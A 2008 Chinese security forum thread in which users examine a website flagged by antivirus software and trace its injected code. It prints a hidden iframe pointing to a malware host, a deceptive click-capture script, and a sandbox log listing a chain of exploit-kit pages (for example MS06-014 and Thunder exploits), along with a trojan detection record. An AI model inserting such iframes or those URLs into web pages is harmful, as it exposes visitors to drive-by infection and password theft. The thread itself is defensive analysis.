可疑网站

显示全部楼层 · 发表于 2008-10-17 15:32:36

http://www.1000fr.com
可疑网站，请高手看看，打开后红伞不停的报！

显示全部楼层 · 发表于 2008-10-17 15:37:44

被挂马了

显示全部楼层 · 发表于 2008-10-17 15:57:18

诺顿10.1版本没报

显示全部楼层 · 发表于 2008-10-17 15:59:25

我的小三未报

显示全部楼层 · 发表于 2008-10-17 16:15:44

MS正常.

显示全部楼层 · 发表于 2008-10-17 16:22:06

http://www.oiuytr.net/new/a133.css
http://down.hs7yue.cn/down/ko.css

显示全部楼层 · 发表于 2008-10-17 16:22:17

刚刚FreShow毕业找不出东西
呜呜 filter不出来看来还得继续学习探索

tanlimo怎么找出来的继续教我

[ 本帖最后由 lingbo110120 于 2008-10-17 16:23 编辑 ]

显示全部楼层 · 发表于 2008-10-17 16:35:19

这个FreShow找不出来的

地址是个变量

http://googlehaocpczhongyi.haocpc.net/show.php?z_uid=106&zoneid=155&z_uc_ks=7740&z_sh=663&z_sw=1016&z_scd=32&z_c_url=http%3A//www.1000fr.com/&z_utz=8&z_ujava=1&z_ufv=9.0.115.0

复制代码

在沙盘里找到生成的show[1].htm文件

内容

<iframe src=http://www.hryspan.cn/one/a39.htm width=50 height=0 border=0></iframe> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gbk" /><script>
var a_x=new Array();
var a_y=new Array();
var i=0;
a_x[0]=0;
a_y[0]=0;
function v(s) {window.status = s;return true;}
function o() {window.status='';}
function c(o,e){a=document.getElementById(o); e=e?e:window.event?window.event:null;x=e?e.screenX:null;y=e?e.screenY:null;a.href+='&x='+x+'&y='+y+'&ax='+a_x+'&ay='+a_y;}
function h(e){e=e?e:window.event?window.event:null;x=e?e.screenX:null;y=e?e.screenY:null;if(i>6) return ;a_x[i]=x;a_y[i]=y;i++;}
</script>
<script src='/javascript/swf.js'></script>
<a id='ua' target=_blank href='http://googlehaocpczhongyi.haocpc.net/iclk/?au=c2l0ZXVybD1odHRwJTNBJTJGJTJGd3d3LjEwMDBmci5jb20lMkYmcmVmZXJlcj0ma2V5d29yZD0mc2NyZWVuPTY2M3gxMDE2eDMyJnRpbWV6b25lPTgmamF2YT0xJmZsYXNoPTkuMC4xMTUuMCZwbHVnaW5zPSZtaW1ldHlwZXM9Jmhpc3Rvcnk9JnNjcm9sbGhlaWdodD03NzQwJnZpZXd0aW1lPTEyMjQyMzExNTU=;53d2c1ab40e07f707c27ae2c1bd77b1f&zty=img&uid=106&aid=73&zid=155&targeturl=http%3A%2F%2Fa.oadz.com%2Flink%2FC%2F763%2F112137%2FAiNca-1MFiXgK4fjYLATAgLL72E_%2Fa%2F2085%3Ftrust.alipay.com%2Fdream.htm+' onMouseOver='h(event)' onfocus='return v("")' onclick='c("ua",event)' onmouseout='o()'>
<div style='cursor:pointer;z-index:100;position:absolute;height:90px;width:728px;background-color:#fff;opacity:0.01;filter:alpha(opacity:1);'></div></a>
<div style='height:90px;width:728px;overflow:hidden;'>
<SCRIPT LANGUAGE='JavaScript'>
CreateFlash('73','http://googlehaocpczhongyi.haocpc.net/a/2008-09-27/122250114147492676.swf','728','90');
</SCRIPT>
</div>

复制代码

跟踪

http://www.hryspan.cn/one/a39.htm

复制代码

老东西了

Log is generated by FreShow.
[wide]http://www.hryspan.cn/one/a39.htm
[frame]http://zlwrnm9.cn/a133/fxx.htm
      [frame]http://zlwrnm9.cn/a133/fx.htm
      [frame]http://zlwrnm9.cn/a133/ss.html
      [frame]http://zlwrnm9.cn/a133/Ms06014.htm
      [frame]http://zlwrnm9.cn/sina.htm
      [frame]http://zlwrnm9.cn/UU.htm
      [frame]http://zlwrnm9.cn/a133/Thunder.html
      [frame]http://zlwrnm9.cn/a133/GLWORLD.html
      [frame]http://zlwrnm9.cn/a133/real.htm
      [frame]http://zlwrnm9.cn/a133/Real.html
[script]http://js.users.51.la/1936348.js

显示全部楼层 · 发表于 2008-10-17 19:30:52

病毒 2008-10-17 19:30:07 病毒在文件C:\Documents and Settings\Administrator\桌面\a133.css.td中 Win32.Troj.OnlineGameT.bd.65697 处理成功（操作：删除）

显示全部楼层 · 发表于 2008-10-17 19:39:42

风软挂的这个毒有一段日子了，不知怎的，站长还没有发现呢。

[已鉴定] 可疑网站

回复 1楼 a87750530 的帖子